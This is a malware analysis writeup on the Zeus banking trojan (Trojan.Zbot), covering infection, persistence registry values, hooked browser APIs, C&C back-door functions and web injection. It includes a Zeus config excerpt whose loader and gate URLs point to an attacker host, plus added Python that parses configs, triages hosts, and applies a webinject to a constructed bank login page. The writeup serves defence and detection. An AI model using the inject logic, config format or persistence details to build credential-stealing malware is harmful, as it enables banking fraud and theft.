
Trojan.Zbot

Risk Level 2: Low

Discovered:
January 10, 2010
Updated:
July 15, 2014 2:32:24 PM
Also Known As:
Trojan-Spy:W32/Zbot [F-Secure], PWS-Zbot [McAfee], Trojan-Spy.Win32.Zbot [Kaspersky], Win32/Zbot [Microsoft], Infostealer.Monstres [Symantec], Infostealer.Banker.C [Symantec], Trojan.Wsnpoem [Symantec], Troj/Zbot-LG [Sophos], Troj/Agent-MDL [Sophos], Troj/Zbot-LM [Sophos], Troj/TDSS-BY [Sophos], Troj/Zbot-LO [Sophos], Troj/Buzus-CE [Sophos], Sinowal.WUR [Panda Software], Troj/QakBot-D [Sophos], Troj/Agent-MIR [Sophos], Troj/Qakbot-E [Sophos], Troj/QakBot-G [Sophos], Troj/QakBot-F [Sophos], Troj/Agent-MJS [Sophos], Troj/Agent-MKP [Sophos], Troj/Zbot-ME [Sophos], Troj/Dloadr-CYP [Sophos], Win32/Zbot.WY [Computer Associates], Troj/DwnLdr-IBQ [Sophos], Troj/Zbot-NG [Sophos], W32/Zbot-NI [Sophos], Troj/Zbot-NN [Sophos], Troj/DwnLdr-ICV [Sophos], Troj/DwnLdr-ICY [Sophos], Troj/DwnLdr-IDB [Sophos], Troj/Dldr-DM [Sophos], Troj/Zbot-NR [Sophos], Troj/Zbot-NS [Sophos], Troj/Agent-MWK [Sophos], Troj/FakeAV-BDB [Sophos], Troj/Agent-MYL [Sophos], Troj/Agent-NAX [Sophos], Troj/Zbot-OD [Sophos], Troj/Zbot-OE [Sophos], Troj/Zbot-OT [Sophos], Troj/FakeAV-BGJ [Sophos], Troj/VB-EPV [Sophos], Troj/VB-EQA [Sophos], Troj/Zbot-PE [Sophos], Troj/Zbot-OZ [Sophos], Troj/Zbot-PA [Sophos], Troj/Zbot-OY [Sophos], Troj/FakeAV-BHP [Sophos], Troj/Zbot-OX [Sophos], Troj/Agent-NIV [Sophos], Troj/Zbot-PM [Sophos], Troj/Zbot-PQ [Sophos], Troj/Agent-NKD [Sophos], Troj/Zbot-PP [Sophos], Troj/Zbot-PN [Sophos], Troj/Zbot-PX [Sophos], Troj/Zbot-PW [Sophos], Troj/Zbot-PY [Sophos], Troj/Zbot-PT [Sophos], Troj/Zbot-PV [Sophos], Troj/Zbot-QC [Sophos], Troj/Zbot-QD [Sophos], Troj/Zbot-QK [Sophos], Troj/Zbot-QZ [Sophos], Troj/VB-ERY [Sophos], Troj/Zbot-RA [Sophos], Troj/Zbot-RK [Sophos], Troj/Dloadr-DAD [Sophos], Troj/Zbot-RP [Sophos], Troj/Zbot-RY [Sophos], Troj/Zbot-SC [Sophos], Troj/Zbot-SD [Sophos], Troj/Zbot-SB [Sophos], Troj/Zbot-SF [Sophos], Troj/Zbot-SV [Sophos], Troj/Agent-NUO [Sophos], Troj/Zbot-SP [Sophos], Troj/Meredrop-K [Sophos], Troj/Zbot-SX [Sophos], Troj/Zbot-SY [Sophos], Troj/Zbot-SR [Sophos], 
Troj/Zbot-TG [Sophos], Troj/Zbot-TQ [Sophos], Troj/Zbot-TY [Sophos], Troj/ZBot-UL [Sophos], Troj/Zbot-VN [Sophos], Troj/Zbot-VM [Sophos], Troj/Zbot-VQ [Sophos], Troj/Zbot-WD [Sophos], Troj/Zbot-WF [Sophos], Troj/Zbot-XA [Sophos], Troj/Agent-OLW [Sophos], Troj/Zbot-XO [Sophos], Troj/Zbot-XN [Sophos], Troj/Zbot-YB [Sophos], Troj/Zbot-YE [Sophos], Troj/Zbot-YO [Sophos], Troj/Zbot-YP [Sophos], Troj/ZBot-ZJ [Sophos], Troj/Zbot-AAN [Sophos], Troj/Zbot-AAM [Sophos], Troj/Zbot-ACI [Sophos], Troj/Zbot-AGC [Sophos], Troj/Zbot-AGJ [Sophos], Troj/Zbot-AHE [Sophos], Troj/Zbot-AHD [Sophos], Troj/Zbot-AIR [Sophos]
Type:
Trojan
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Patch operating system and software
2. Infection method
2.1 Spam emails
2.2 Drive-by downloads
3. Functionality
3.1 Toolkit
3.2 System modifications
3.3 Command and control server
3.4 Information gathering
3.5 Password stealing
4. Additional information



1. PREVENTION AND AVOIDANCE

The following actions can be taken to avoid or minimize the risk from this threat.


1.1 User behavior and precautions

Trojan.Zbot relies heavily on social engineering to infect computers. The spam campaigns used by attackers try to trick the user by referencing the latest news stories, playing on fears that their sensitive information has been stolen, suggesting that compromising photos have been taken of them, or any number of other ruses.

Users should use caution when clicking links in such emails. Hovering the mouse pointer over a link will normally show where it actually leads, although a URL shortener or a look-alike domain can still disguise the destination. Users can also check an online Web site rating service such as safeweb.norton.com to see whether a site is deemed safe to visit.


1.2 Patch operating system and software
The attackers behind this threat have been known to use exploit packs to craft Web pages that exploit vulnerable computers and infect them with Trojan.Zbot.

As of February 24, 2010, Trojan.Zbot has been seen using the following vulnerabilities:

Users are advised to ensure that their operating systems and any installed software are fully patched, and that antivirus and firewall software is up to date and operational. Users should turn on automatic updates if available, so that their computers can receive the latest patches and updates when they are made available.



2. INFECTION METHOD
This threat is known to infect computers through a number of methods. We will examine each of these methods in more detail.


2.1 Spam emails
The attackers behind Trojan.Zbot have made a concerted effort to spread their threat using spam campaigns. The subject matter varies from one campaign to the next, but often focuses on current events or attempts to trick the user with emails purporting to come from well-known institutions such as the FDIC, the IRS, MySpace, Facebook, or Microsoft.







2.2 Drive-by downloads

The attackers behind Trojan.Zbot have also been seen using exploit packs to spread the threat via drive-by download attacks. When an unsuspecting user visits one of these Web sites, the exploit code runs without any further action on the user's part, and a vulnerable computer becomes infected with the threat.

The particular exploits used to spread the threat vary, largely depending on the proliferation and ease-of-use of exploits available in the wild at the time the Trojan is distributed.

As of February 24, 2010, Trojan.Zbot has been seen using the following vulnerabilities:



3. FUNCTIONALITY
The Zeus threat is actually comprised of three parts: a toolkit, the actual Trojan, and the command & control (C&C) server. The toolkit is used to create the threat, the Trojan modifies the compromised computer, and the C&C server is used to monitor and control the Trojan.



3.1 Toolkit
Trojan.Zbot is created using a toolkit that is readily available on underground marketplaces used by online criminals. Different versions are available, from free ones (often backdoored themselves) to versions costing up to US$700. These marketplaces also offer other Zeus-related services, from bulletproof hosting for C&C servers to rental of already-established botnets.



Regardless of the version, the toolkit is used for two things. First, the attacker edits the configuration file and compiles it into a .bin file. Second, the attacker compiles an executable, which is then sent to the potential victim by various means. This executable is what is commonly known as the Zeus Trojan or Trojan.Zbot.




The ease of use of the toolkit's user interface makes it quick and easy for non-technical would-be criminals to get a piece of the action. Coupled with the multitude of illicit copies of the toolkit circulating on the black market, this ensures that Trojan.Zbot continues to be one of the most popular and widely seen Trojans on the threat landscape.


3.2 System modifications
Unusually for today's threat landscape, Trojan.Zbot tends to use the same file names across variants: given the way the toolkit works, each revision keeps the same names when the executables are created. While the initial executable can be named whatever the attacker wants, the files mentioned in the following subsections use the names produced by the currently known toolkits.


User account privileges
The location that Trojan.Zbot installs itself to is directly tied to the level of privileges the logged-in user account has at the time of infection. If the user is an administrator, the files are placed in the %System% folder. If not, they are copied to %UserProfile%\Application Data.


Trojan executable
Trojan.Zbot generally creates a copy of itself using one of the following file names:
  • ntos.exe
  • oembios.exe
  • twext.exe
  • sdra64.exe
  • pdfupd.exe


Configuration file
The threat creates a folder named “lowsec” in either the %System% or %UserProfile%\Application Data folder and then drops one of the following files into it:
  • video.dll
  • sysproc32.sys
  • user.ds
  • ldx.exe

While the extensions vary, these are all copies of the configuration file that the attacker wrote and compiled with the Zeus toolkit (the sample below shows it in the form the toolkit takes as input). The file lists the Web pages to monitor and the Web sites to block, such as those belonging to security companies, and it can be updated by the attacker through the threat's back door.

Here is a portion of a sample configuration file (the toolkit's "entry ... end" block syntax; lines beginning with ";" are comments):

entry "DynamicConfig"
  url_loader "http://[REMOVED].com/zeusbot/ZuesBotTrojan.exe"
  url_server "http://[REMOVED].com/zeusbot/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;
  end
  entry "WebFilters"
    "!http://[REMOVED].com"
    "https://[REMOVED].com/*"
    "!http://[REMOVED].ru/*"
  end
  entry "WebDataFilters"
    ; "!http://[REMOVED].ru/*" "passw;login"
  end
  entry "WebFakes"
    ; "http://[REMOVED].com" "http://[REMOVED].com" "GP" "" ""
  end
  entry "TANGrabber"
    "https://[REMOVED].com/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
  end
  entry "DnsMap"
    ;127.0.0.1
  end
end
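The configuration above is what the toolkit takes as input before it is compiled and encrypted. Parsing this source form is useful when a config is recovered from a C&C server or from a copy of the toolkit, because url_server is the gate that receives stolen data, url_loader is where bot updates are pulled from, and the WebFilters and TANGrabber masks name the targeted sites. The parser below is an added example written for this writeup; it is not Symantec's code and not part of the Zeus toolkit. The sample config it carries is constructed to mirror the structure shown above, with hosts under the reserved example.invalid domain in place of the [REMOVED] values, and the meaning it attaches to the "!" and "@" flag characters on WebFilters masks is an assumption about the 1.x toolkit rather than something this page states.

```python
"""Parse a Zeus (Trojan.Zbot) toolkit configuration file and pull out the
indicators an analyst wants from it: the C&C gate, the loader URL and the
URL masks the bot watches.

Added example for this writeup; it is not Symantec's code and not the Zeus
toolkit's.  The sample below is constructed: it mirrors the structure shown
on the page, with hosts under the reserved example.invalid domain standing
in for the [REMOVED] values.
"""
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Section:
    name: str
    values: dict = field(default_factory=dict)    # key "value" lines, e.g. url_server
    entries: list = field(default_factory=list)   # lines made only of quoted strings
    children: dict = field(default_factory=dict)  # nested entry "..." ... end blocks


def parse_config(text: str) -> Section:
    """Build a tree of Section objects from the entry/end block syntax.
    Lines starting with ';' are comments.  Quoted strings may contain spaces,
    ';' and '#', so a real tokenizer (shlex) is used rather than split()."""
    root = Section("<root>")
    stack = [root]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        tokens = shlex.split(line)               # comments=False by default: '#' is data
        if tokens[0] == "entry":
            if len(tokens) != 2:
                raise ValueError(f"line {lineno}: malformed entry header")
            child = Section(tokens[1])
            stack[-1].children[tokens[1]] = child
            stack.append(child)
        elif tokens[0] == "end":
            if len(stack) == 1:
                raise ValueError(f"line {lineno}: 'end' without matching 'entry'")
            stack.pop()
        elif line.startswith('"'):               # list-style line: every token is data
            stack[-1].entries.append(tuple(tokens))
        else:                                    # keyword followed by its value(s)
            key, vals = tokens[0], tokens[1:]
            stack[-1].values[key] = vals[0] if len(vals) == 1 else vals
    if len(stack) != 1:
        raise ValueError("unterminated entry block(s): " + ", ".join(s.name for s in stack[1:]))
    return root


def extract_indicators(cfg: Section) -> dict:
    """Pull the network indicators out of DynamicConfig.  WebFilters masks may
    carry a leading flag character ('!' = do not log the page, '@' = take a
    screenshot on click, as I understand the 1.x toolkit; treat that as an
    assumption); it is stripped so the mask is usable as a plain IoC."""
    dyn = cfg.children.get("DynamicConfig")
    if dyn is None:
        raise ValueError("no DynamicConfig block found")

    def first_fields(section_name: str) -> list:
        sec = dyn.children.get(section_name)
        return [e[0] for e in sec.entries] if sec else []

    ind = {
        "c2_gate": dyn.values.get("url_server"),        # where stolen data is POSTed
        "loader": dyn.values.get("url_loader"),         # where bot updates are fetched
        "webinjects_file": dyn.values.get("file_webinjects"),
        "webfilters": [m.lstrip("!@") for m in first_fields("WebFilters")],
        "tan_grabber": first_fields("TANGrabber"),
    }
    urls = [ind["c2_gate"], ind["loader"], *ind["webfilters"], *ind["tan_grabber"]]
    ind["hosts"] = sorted({urlsplit(u).netloc for u in urls if u})  # blocklist candidates
    return ind


# Constructed sample: same layout as the page's excerpt, placeholder hosts.
SAMPLE_CONFIG = r'''
entry "DynamicConfig"
  url_loader "http://bot.example.invalid/zeusbot/bot.exe"
  url_server "http://bot.example.invalid/zeusbot/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;
  end
  entry "WebFilters"
    "!http://*.example.invalid"
    "https://bank.example.invalid/*"
    "!http://mail.example.invalid/*"
  end
  entry "WebDataFilters"
    ; "!http://mail.example.invalid/*" "passw;login"
  end
  entry "WebFakes"
    ; "http://a.example.invalid" "http://b.example.invalid" "GP" "" ""
  end
  entry "TANGrabber"
    "https://bank.example.invalid/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
  end
  entry "DnsMap"
    ;127.0.0.1
  end
end
'''

if __name__ == "__main__":
    for key, value in extract_indicators(parse_config(SAMPLE_CONFIG)).items():
        print(f"{key}: {value}")
```

Commented-out lines such as the WebDataFilters and WebFakes entries in the sample are skipped, so an analyst sees only what the bot would actually act on; the `hosts` list is the part worth feeding into a proxy or DNS blocklist, with the wildcard mask left as-is so it is not mistaken for a literal host name.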


Stolen data file

A second file is dropped into the “lowsec” folder, with one of the following file names:
  • audio.dll
  • sysproc86.sys
  • local.ds

This file serves as a store for the stolen information. When a password is obtained by the threat, it is saved in this file and later sent to the attacker.


Registry subkeys and entries created
In addition, the threat adds itself to the registry so that it starts when Windows starts, using one of two registry values:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"Userinit" = "%System%\userinit.exe, %System%\sdra64.exe"
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"userinit" = "%UserProfile%\Application Data\sdra64.exe"

If the logged-in account at the time of infection has administrative privileges, the first entry is created. If the account has limited privileges, the second is used.


Process injection
Depending on the level of privileges, Trojan.Zbot injects itself into one of two processes. If the account has administrative privileges, the threat injects itself into winlogon.exe; if not, it injects itself into explorer.exe. Because the working code then lives inside that process rather than in the dropped file, a memory check of winlogon.exe or explorer.exe is needed to confirm an active infection.

The threat also injects code into an svchost.exe process, which it later uses when stealing banking information.
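Taken together, the file names, the lowsec folder, the Userinit and Run values and the privilege split above give an analyst a checklist. The script below is an added example written for this writeup, not Symantec's tooling or the toolkit's code. It is in Python so that it runs on any platform against data already exported from the suspect host (a reg query of the Winlogon and Run keys, and a directory listing), and its sample inputs are constructed to look like a machine infected while an administrator was logged in. The genuine userinit.exe is only accepted from the System folder, so a same-named file anywhere else is reported rather than excused.

```python
"""Triage checks for the Trojan.Zbot host artefacts described in section 3.2:
the Winlogon\\Userinit hijack, the HKCU Run value, the trojan copy and the
'lowsec' folder.

Added example for this writeup, not Symantec's or the toolkit's code.  It is
written to run offline against data you have already exported from a host
(reg query output, a directory listing); the constructed inputs at the bottom
stand in for an infected machine where the user was an administrator.
"""
import ntpath

ZBOT_EXE_NAMES = {"ntos.exe", "oembios.exe", "twext.exe", "sdra64.exe", "pdfupd.exe"}
ZBOT_LOWSEC_NAMES = {"video.dll", "sysproc32.sys", "user.ds", "ldx.exe",   # config file
                     "audio.dll", "sysproc86.sys", "local.ds"}             # stolen data


def _is_genuine_userinit(path: str) -> bool:
    # The real userinit.exe lives in the System folder; a copy elsewhere with
    # the same name is a masquerade and gets reported, not excused.
    head, tail = ntpath.split(path)
    return tail.lower() == "userinit.exe" and head.lower().endswith("system32")


def userinit_extras(userinit_value: str) -> list:
    """Every program in Winlogon\\Userinit other than the genuine userinit.exe.
    Windows writes the value as a comma-separated list with a trailing comma
    ('C:\\WINDOWS\\system32\\userinit.exe,'), so an empty trailing element is
    normal; anything else appended runs at every interactive logon."""
    extras = []
    for item in userinit_value.split(","):
        item = item.strip().strip('"')
        if item and not _is_genuine_userinit(item):
            extras.append(item)
    return extras


def run_key_hits(run_values: dict) -> list:
    """HKCU\\...\\Run values (name -> command) that launch a known Zbot file
    name, or that reuse the value name 'userinit', which nothing legitimate
    registers under Run.  Commands are assumed to be a bare path, as in the
    writeup; arguments are not parsed."""
    hits = []
    for name, cmd in run_values.items():
        exe = ntpath.basename(cmd.strip().strip('"')).lower()
        if name.lower() == "userinit" or exe in ZBOT_EXE_NAMES:
            hits.append((name, cmd))
    return hits


def file_hits(paths: list) -> list:
    """Paths whose file name matches the trojan copy, or a config / stolen-data
    file inside a folder named 'lowsec'."""
    hits = []
    for p in paths:
        parent, name = ntpath.split(p)
        name = name.lower()
        if name in ZBOT_EXE_NAMES:
            hits.append(p)
        elif ntpath.basename(parent).lower() == "lowsec" and name in ZBOT_LOWSEC_NAMES:
            hits.append(p)
    return hits


def triage(userinit_value: str, run_values: dict, paths: list) -> dict:
    """Combine the checks and infer which install path the sample took: the
    Winlogon hijack / %System% copy needs administrator rights, the HKCU Run
    value / Application Data copy is the limited-user fallback."""
    result = {
        "userinit_extras": userinit_extras(userinit_value),
        "run_key_hits": run_key_hits(run_values),
        "file_hits": file_hits(paths),
    }
    result["infected"] = any(result[k] for k in ("userinit_extras", "run_key_hits", "file_hits"))
    if result["userinit_extras"] or any("system32" in p.lower() for p in result["file_hits"]):
        result["privilege"] = "administrator"
    elif result["infected"]:
        result["privilege"] = "limited user"
    else:
        result["privilege"] = None
    return result


# Constructed sample: what an exported registry value and a file listing look
# like on a host infected while an administrator was logged in.
SAMPLE_USERINIT = r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,"
SAMPLE_RUN = {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"}   # benign autorun
SAMPLE_FILES = [
    r"C:\WINDOWS\system32\userinit.exe",
    r"C:\WINDOWS\system32\sdra64.exe",
    r"C:\WINDOWS\system32\lowsec\local.ds",
    r"C:\WINDOWS\system32\lowsec\user.ds",
    r"C:\Documents and Settings\alice\Application Data\notes.txt",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_USERINIT, SAMPLE_RUN, SAMPLE_FILES).items():
        print(f"{key}: {value}")
```

A hit on any one of the three checks is enough to isolate the machine; the privilege inference only tells you where else to look (the %System% copy and Winlogon value for an administrator, Application Data and HKCU Run for a limited user), and a clean result on disk does not rule out code already injected into winlogon.exe or explorer.exe.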


3.3 Command and control server
When Trojan.Zbot is installed, it reports to the C&C server whose address was placed in the configuration file when the executable was built with the toolkit. The first thing it asks for is an updated version of its configuration file.


Back door
The back door to the C&C server provides the attacker with a versatile set of options for how he or she can use the compromised computer. For example, attackers can perform any of the following actions, if they so wish:
  • Restart or shut down the computer
  • Delete system files, rendering the computer unusable
  • Disable or restore access to a particular URL
  • Inject rogue HTML content into pages that match a defined URL
  • Download and execute a file
  • Execute a local file
  • Add or remove a file mask for local search (e.g. hide the threat’s files)
  • Upload a file or folder
  • Steal digital certificates
  • Update the configuration file
  • Rename the bot executable
  • Upload or delete Flash cookies
  • Change the Internet Explorer start page

The domains that the back door connects to vary, depending on what the attacker has included in the configuration file.


Server-side control panel
The C&C server not only allows the attacker to perform a number of functions on a compromised computer, but also gives them the ability to manage a botnet of Zeus-infected computers. An attacker can monitor statistics on the number of infected computers he or she controls, as well as generate reports on the stolen information the bots have gathered.








3.4 Information gathering
Once installed Trojan.Zbot will automatically gather a variety of information about the compromised computer, which it sends back to the C&C server. This information includes the following:
  • A unique bot identification string
  • Name of the botnet
  • Version of the bot
  • Operating system version
  • Operating system language
  • Local time of the compromised computer
  • Uptime of the bot
  • Last report time
  • Country of the compromised computer
  • IP address of the compromised computer
  • Process names


3.5 Password stealing
The core purpose of Trojan.Zbot is to steal passwords, as is evident from the number of different methods it uses to do so.

Upon installation, Trojan.Zbot will immediately check Protected Storage (PStore) for passwords. It specifically targets passwords used in Internet Explorer, along with those for FTP and POP3 accounts. It also deletes any cookies stored in Internet Explorer. That way, the user must log in again to any commonly visited Web sites, and the threat can record the login credentials at the time.

A more versatile method of password stealing is driven by the configuration file during Web browsing. When the attacker generates the configuration file, he or she can include any URLs to be monitored. When one of these URLs is visited, the threat gathers any user names and passwords typed into the page. To do this, it hooks functions in several DLLs inside the browser process. Because the WININET hooks sit above the TLS layer in Internet Explorer, the threat sees HTTPS request and response bodies in the clear, before they are encrypted on the way out and after they are decrypted on the way in; the USER32 hooks additionally let it read keystrokes and clipboard contents. The following is a list of DLLs and the APIs within them that are hooked by Trojan.Zbot:

WININET.DLL
  • HttpSendRequestW
  • HttpSendRequestA
  • HttpSendRequestExW
  • HttpSendRequestExA
  • InternetReadFile
  • InternetReadFileExW
  • InternetReadFileExA
  • InternetQueryDataAvailable
  • InternetCloseHandle

WS2_32.DLL and WSOCK32.DLL
  • send
  • sendto
  • closesocket
  • WSASend
  • WSASendTo

USER32.DLL
  • GetMessageW
  • GetMessageA
  • PeekMessageW
  • PeekMessageA
  • GetClipboardData

Trojan.Zbot can also inject other fields into the Web pages it monitors. To do this, it intercepts each page as it is returned to the compromised computer and adds extra fields before the browser renders it. For example, if a user requests a page from their bank's Web site and the bank returns a page requiring a user name and password, the threat can be configured to inject a third field asking for the user's Social Security Number. Because the modification happens inside the browser after the response has been received and decrypted, the address bar, the padlock and the bank's genuine certificate still look normal; the bank's server never sees the altered page, only an unexpected extra field in the submitted form, which is one of the few server-side signs of an inject.
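The injection is driven by the webinjects.txt file named in the configuration (file_webinjects). The following is an added example written for this writeup, not code from the toolkit or from Symantec: it parses an inject file, applies it to a constructed login page the way the code inside the browser would once a set_url mask matches, and then shows the one thing a defender can look for, an input field in the rendered page that the server never sent. The set_url / data_before / data_inject / data_after block layout and the meaning of the G and P flags are my understanding of the 1.x format and are assumptions here; the inject file and the page are constructed.

```python
"""Parse a Zeus 'webinjects.txt' file and apply it to an HTML response the
way the code injected into the browser does once a set_url mask matches,
then show how the resulting page differs from what the server sent.

Added example for this writeup, not code from the toolkit or from Symantec.
The set_url / data_before / data_inject / data_after block layout is the
1.x toolkit's inject format as I know it and is an assumption here; the
inject file and the login page below are constructed.
"""
import re
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass
class WebInject:
    url_mask: str   # set_url mask, '*' wildcards
    flags: str      # e.g. "GP": act on responses to GET and POST requests
    before: str     # anchor text that must precede the injection ('*' = any run)
    inject: str     # HTML to insert
    after: str      # anchor text that must follow; content between is replaced


_SECTIONS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text: str) -> list:
    injects, mask, flags, section = [], None, "GP", None
    parts = {k: [] for k in _SECTIONS}
    for raw in text.splitlines():
        kw = raw.strip()
        if kw.startswith("set_url"):
            tokens = kw.split()
            mask, flags = tokens[1], (tokens[2] if len(tokens) > 2 else "GP")
        elif kw in _SECTIONS:
            section = kw
        elif kw == "data_end":
            if section == "data_after":          # a before/inject/after group is complete
                if mask is None:
                    raise ValueError("data block before any set_url")
                injects.append(WebInject(mask, flags, *("\n".join(parts[k]) for k in _SECTIONS)))
                parts = {k: [] for k in _SECTIONS}
            section = None
        elif section is not None:
            parts[section].append(raw.rstrip("\r\n"))   # keep the line's own indentation
    return injects


def _anchor_regex(anchor: str) -> re.Pattern:
    # '*' inside an anchor matches any run of characters, shortest first.
    return re.compile(".*?".join(re.escape(p) for p in anchor.split("*")), re.S)


def apply_injects(url: str, method: str, html: str, injects: list) -> tuple:
    """Return (modified_html, masks_that_fired).  A page is rewritten only if
    the URL matches the mask, the request method is in the flags and the
    before/after anchors are found; otherwise it passes through unchanged."""
    fired = []
    for wi in injects:
        if method[:1].upper() not in wi.flags or not fnmatchcase(url, wi.url_mask):
            continue
        m_before = _anchor_regex(wi.before).search(html)
        if not m_before:
            continue
        start = end = m_before.end()
        if wi.after:
            m_after = _anchor_regex(wi.after).search(html, start)
            if not m_after:
                continue
            end = m_after.start()
        html = html[:start] + wi.inject + html[end:]
        fired.append(wi.url_mask)
    return html, fired


_INPUT_NAME = re.compile(r'<input\b[^>]*\bname="([^"]+)"', re.I)


def extra_form_fields(original: str, delivered: str) -> set:
    """Input names present in the page the browser rendered but absent from
    what the server sent.  Because Zeus rewrites the response inside the
    browser, comparing the server's own copy of the page with what the client
    rendered (or with the fields the client submits) exposes exactly this."""
    return set(_INPUT_NAME.findall(delivered)) - set(_INPUT_NAME.findall(original))


# Constructed inject file: add an SSN field after the password box, as in the
# example described in the writeup.
SAMPLE_WEBINJECTS = """\
set_url https://bank.example.invalid/login* GP
data_before
<input type="password" name="pass"*>
data_end
data_inject
<label for="ssn">Social Security Number</label><input type="text" name="ssn">
data_end
data_after
data_end
"""

# Constructed login page as the bank's server would send it.
SAMPLE_PAGE = """\
<form method="post" action="/login">
<input type="text" name="user">
<input type="password" name="pass">
<input type="submit" value="Sign in">
</form>
"""

if __name__ == "__main__":
    page, fired = apply_injects("https://bank.example.invalid/login?lang=en", "GET",
                                SAMPLE_PAGE, parse_webinjects(SAMPLE_WEBINJECTS))
    print(page)
    print("fired:", fired, "extra fields:", extra_form_fields(SAMPLE_PAGE, page))
```

The empty data_after block in the sample means "insert immediately after the anchor"; when data_after is non-empty, everything between the two anchors is replaced, which is how an inject can also remove a bank's own warning text. Nothing here touches the URL or the TLS session, which is why the padlock gives the victim no warning.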







4. ADDITIONAL INFORMATION
For more information relating to this threat family, please see the following resources:

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Ben Nahorney and Nicolas Falliere